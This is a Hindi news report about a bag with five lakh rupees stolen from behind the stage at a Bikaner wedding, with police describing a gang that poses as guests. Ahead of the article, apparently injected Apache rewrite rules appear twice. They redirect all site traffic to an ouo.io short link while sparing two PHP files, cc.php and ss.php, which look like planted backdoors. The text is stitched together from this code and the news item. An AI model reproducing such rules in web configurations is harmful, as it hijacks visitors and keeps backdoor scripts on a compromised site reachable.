
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 780
Previous Nextबीकानेर। राजस्थान में बीकानेर के बीछवाल में श्रीगंगानगर रोड़ स्थित शगुन पैलेस में बीते रविवार की रात एक महिला का पांच लाख रुपए से भरा बैग पार हो गया। महिला जब स्टेज पर आशीर्वाद समारोह में भाग ले रही थी तब उसके पीछे खड़ा युवक बैग पार कर ले गया। सारी घटना कैमरे में कैद हो गई। पुलिस ने मामला दर्ज कर जांच चोर की तलाश शुरू कर दी है।
पीड़ित महिला संतोष तंवर ने पुलिस में रिपोर्ट देकर बताया कि बीती रात बीछवाल रोड स्थित शगुन पैलेस में उसके देवर राजेन्द्र सिंह तंवर की बेटी की शादी थी और आशीर्वाद समारोह के दौरान जब राजेन्द्र सिंह अपनी पत्नी के साथ वर वधु को स्टेज पर चढ़कर आशीर्वाद दे रहे थे तभी दुल्हन के पीछे रखी कुर्सी के पास रखा रुपयों से भरा उनका बैग नीली शर्ट पहना युवक लेकर गायब हो गया। इस युवक की हरकत सामने चल रहे केमरे में भी कैद हो गई जिसमे पांव में खुजली करता यह युवक स्टेज के पीछे आया और उस बैग को पार कर लिया। वारदात का पता लगने के बाद तंवर परिवार हरकत में आया और पुलिस को इसकी इतला दी और बीछवाल पुलिस कैमरा फुटेज में आए इस युवक का पता लगाने में जुटी है। पुलिस की मानें तो गिरोह के सदस्य एक परिवार बनकर समारोह में मेहमान की तरह शामिल होते हैं और समारोह स्थल में आकर अलग-अलग हो जाते हैं। ये पहली वारदात नहीं है बल्कि पिछले एक माह में करीब आधा दर्जन ऐसी वारदातें अलग अलग थाना क्षेत्र में हो चुकी हैं।